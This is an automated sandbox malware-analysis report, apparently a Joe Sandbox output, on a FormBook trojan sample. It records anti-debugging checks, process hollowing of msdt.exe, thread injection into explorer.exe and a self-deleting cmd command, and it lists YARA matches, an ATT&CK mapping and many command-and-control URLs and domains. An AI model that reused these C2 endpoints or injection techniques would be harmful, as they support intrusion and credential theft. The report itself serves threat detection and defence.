Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD8A0A mov eax, dword ptr fs:[00000030h]	2_2_04AD8A0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h]	2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h]	2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h]	2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF8E00 mov eax, dword ptr fs:[00000030h]	2_2_04AF8E00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B81608 mov eax, dword ptr fs:[00000030h]	2_2_04B81608
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AE3A1C mov eax, dword ptr fs:[00000030h]	2_2_04AE3A1C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h]	2_2_04AFA61C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h]	2_2_04AFA61C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h]	2_2_04ACAA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h]	2_2_04ACAA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h]	2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC5210 mov ecx, dword ptr fs:[00000030h]	2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h]	2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h]	2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD766D mov eax, dword ptr fs:[00000030h]	2_2_04AD766D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B0927A mov eax, dword ptr fs:[00000030h]	2_2_04B0927A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h]	2_2_04B7B260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h]	2_2_04B7B260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B98A62 mov eax, dword ptr fs:[00000030h]	2_2_04B98A62
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h]	2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B54257 mov eax, dword ptr fs:[00000030h]	2_2_04B54257
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]	2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]	2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]	2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h]	2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h]	2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8EA55 mov eax, dword ptr fs:[00000030h]	2_2_04B8EA55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h]	2_2_04B8AE44
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h]	2_2_04B8AE44
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h]	2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h]	2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h]	2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B95BA5 mov eax, dword ptr fs:[00000030h]	2_2_04B95BA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h]	2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h]	2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h]	2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h]	2_2_04AD1B8F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h]	2_2_04AD1B8F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8138A mov eax, dword ptr fs:[00000030h]	2_2_04B8138A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B7D380 mov ecx, dword ptr fs:[00000030h]	2_2_04B7D380
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF2397 mov eax, dword ptr fs:[00000030h]	2_2_04AF2397
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AD8794 mov eax, dword ptr fs:[00000030h]	2_2_04AD8794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFB390 mov eax, dword ptr fs:[00000030h]	2_2_04AFB390
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B037F5 mov eax, dword ptr fs:[00000030h]	2_2_04B037F5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEDBE9 mov eax, dword ptr fs:[00000030h]	2_2_04AEDBE9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h]	2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h]	2_2_04B453CA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h]	2_2_04B453CA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h]	2_2_04AC4F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h]	2_2_04AC4F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFE730 mov eax, dword ptr fs:[00000030h]	2_2_04AFE730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h]	2_2_04AFA70E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h]	2_2_04AFA70E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B8131B mov eax, dword ptr fs:[00000030h]	2_2_04B8131B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h]	2_2_04B5FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h]	2_2_04B5FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h]	2_2_04B9070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h]	2_2_04B9070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AEF716 mov eax, dword ptr fs:[00000030h]	2_2_04AEF716
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]	2_2_04ACDB60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADFF60 mov eax, dword ptr fs:[00000030h]	2_2_04ADFF60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B98F6A mov eax, dword ptr fs:[00000030h]	2_2_04B98F6A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h]	2_2_04AF3B7A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h]	2_2_04AF3B7A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B98B58 mov eax, dword ptr fs:[00000030h]	2_2_04B98B58
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACDB40 mov eax, dword ptr fs:[00000030h]	2_2_04ACDB40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ADEF40 mov eax, dword ptr fs:[00000030h]	2_2_04ADEF40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04ACF358 mov eax, dword ptr fs:[00000030h]	2_2_04ACF358

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Code function: 0_2_00A8ACE0 LdrLoadDll,

0_2_00A8ACE0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.controlplus.systems
Source: C:\Windows\explorer.exe	Domain query: www.mogi.africa
Source: C:\Windows\explorer.exe	Domain query: www.kellnovaglobalfood.info
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: B60000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Thread register set: target process: 3452			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3452			Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"

Jump to behavior

Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.000000000833A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match	File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match	File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	512 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Masquerading	1 Input Capture	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7pECKdsaig.exe	77%	ReversingLabs	Win32.Trojan.FormBook
7pECKdsaig.exe	59%	Virustotal		Browse
7pECKdsaig.exe	100%	Avira	TR/Crypt.ZPACK.Gen
7pECKdsaig.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.7pECKdsaig.exe.a80000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.2.7pECKdsaig.exe.a80000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.quickhealcareltd.co.uk	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com	100%	Avira URL Cloud	malware
http://www.b708.com/ar73/	100%	Avira URL Cloud	malware
http://www.ckpconsulting.com	0%	Avira URL Cloud	safe
http://www.kellnovaglobalfood.infoReferer:	0%	Avira URL Cloud	safe
http://www.innovantexclusive.comReferer:	0%	Avira URL Cloud	safe
http://www.jacksontcpassettlement.comReferer:	0%	Avira URL Cloud	safe
http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com	100%	Avira URL Cloud	malware
http://www.kellnovaglobalfood.info/ar73/	100%	Avira URL Cloud	malware
http://www.2348x.com	0%	Avira URL Cloud	safe
http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com	100%	Avira URL Cloud	malware
http://www.controlplus.systems	0%	Avira URL Cloud	safe
http://www.quickhealcareltd.co.uk/ar73/	100%	Avira URL Cloud	malware
http://www.mogi.africa/ar73/www.kellnovaglobalfood.info	100%	Avira URL Cloud	malware
http://www.ckpconsulting.com/ar73/www.2348x.com	100%	Avira URL Cloud	malware
http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems	100%	Avira URL Cloud	malware
http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk	100%	Avira URL Cloud	malware
http://www.mogi.africaReferer:	0%	Avira URL Cloud	safe
http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_	100%	Avira URL Cloud	malware
http://www.ckpconsulting.comReferer:	0%	Avira URL Cloud	safe
http://www.b708.comReferer:	0%	Avira URL Cloud	safe
http://www.quickhealcareltd.co.ukReferer:	0%	Avira URL Cloud	safe
http://www.ckpconsulting.com/ar73/	100%	Avira URL Cloud	malware
http://www.mtevz.online/ar73/	100%	Avira URL Cloud	malware
http://www.2348x.com/ar73/	100%	Avira URL Cloud	malware
http://www.kellnovaglobalfood.info	0%	Avira URL Cloud	safe
http://www.arredobagno.club/ar73/www.mtevz.online	100%	Avira URL Cloud	malware
http://www.hurricanevalleyatvjamboree.com/ar73/	100%	Avira URL Cloud	malware
http://www.ingrambaby.com/ar73/	100%	Avira URL Cloud	malware
http://www.innovantexclusive.com/ar73/www.1wwuwa.top	100%	Avira URL Cloud	malware
http://www.mogi.africa	0%	Avira URL Cloud	safe
http://www.controlplus.systems/ar73/	100%	Avira URL Cloud	malware
http://www.arredobagno.clubReferer:	0%	Avira URL Cloud	safe
http://www.echadholisticbar.com/ar73/	100%	Avira URL Cloud	malware
http://www.1wwuwa.top	0%	Avira URL Cloud	safe
http://www.ingrambaby.com	0%	Avira URL Cloud	safe
http://www.jacksontcpassettlement.com/ar73/	100%	Avira URL Cloud	malware
http://www.authenticityhacking.com/ar73/	100%	Avira URL Cloud	malware
http://www.ingrambaby.com/ar73/www.arredobagno.club	100%	Avira URL Cloud	malware
http://www.hurricanevalleyatvjamboree.com	0%	Avira URL Cloud	safe
http://www.1wwuwa.topReferer:	0%	Avira URL Cloud	safe
http://www.mogi.africa/ar73/	100%	Avira URL Cloud	malware
http://www.echadholisticbar.comReferer:	0%	Avira URL Cloud	safe
http://www.arredobagno.club/ar73/	100%	Avira URL Cloud	malware
http://www.mtevz.onlineReferer:	0%	Avira URL Cloud	safe
http://www.authenticityhacking.comReferer:	0%	Avira URL Cloud	safe
http://www.b708.com	0%	Avira URL Cloud	safe
http://www.quickhealcareltd.co.uk	0%	Avira URL Cloud	safe
http://www.innovantexclusive.com	0%	Avira URL Cloud	safe
http://www.jacksontcpassettlement.com	0%	Avira URL Cloud	safe
http://www.1wwuwa.top/ar73/www.echadholisticbar.com	100%	Avira URL Cloud	malware
http://www.ingrambaby.comReferer:	0%	Avira URL Cloud	safe
http://www.hurricanevalleyatvjamboree.comReferer:	0%	Avira URL Cloud	safe
http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com	100%	Avira URL Cloud	malware
http://www.2348x.comReferer:	0%	Avira URL Cloud	safe
http://www.controlplus.systemsReferer:	0%	Avira URL Cloud	safe
http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_	100%	Avira URL Cloud	malware
http://www.mtevz.online	0%	Avira URL Cloud	safe
http://www.authenticityhacking.com/ar73/www.ckpconsulting.com	100%	Avira URL Cloud	malware
http://www.mtevz.online/ar73/r	100%	Avira URL Cloud	malware
http://www.2348x.com/ar73/www.b708.com	100%	Avira URL Cloud	malware
www.2348x.com/ar73/	100%	Avira URL Cloud	malware
http://www.echadholisticbar.com	0%	Avira URL Cloud	safe
http://www.authenticityhacking.com	0%	Avira URL Cloud	safe
http://www.1wwuwa.top/ar73/	100%	Avira URL Cloud	malware
http://www.arredobagno.club	0%	Avira URL Cloud	safe
http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com	100%	Avira URL Cloud	malware
http://www.innovantexclusive.com/ar73/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
controlplus.systems	34.102.136.180	true	false		unknown
kellnovaglobalfood.info	34.102.136.180	true	false		unknown
www.quickhealcareltd.co.uk	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.mogi.africa	unknown	unknown	true		unknown
www.kellnovaglobalfood.info	unknown	unknown	true		unknown
www.controlplus.systems	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_	false	Avira URL Cloud: malware	unknown
http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_	false	Avira URL Cloud: malware	unknown
www.2348x.com/ar73/	true	Avira URL Cloud: malware	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.b708.com/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.innovantexclusive.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mtevz.online/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ckpconsulting.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jacksontcpassettlement.comReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kellnovaglobalfood.infoReferer:	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.kellnovaglobalfood.info/ar73/	explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
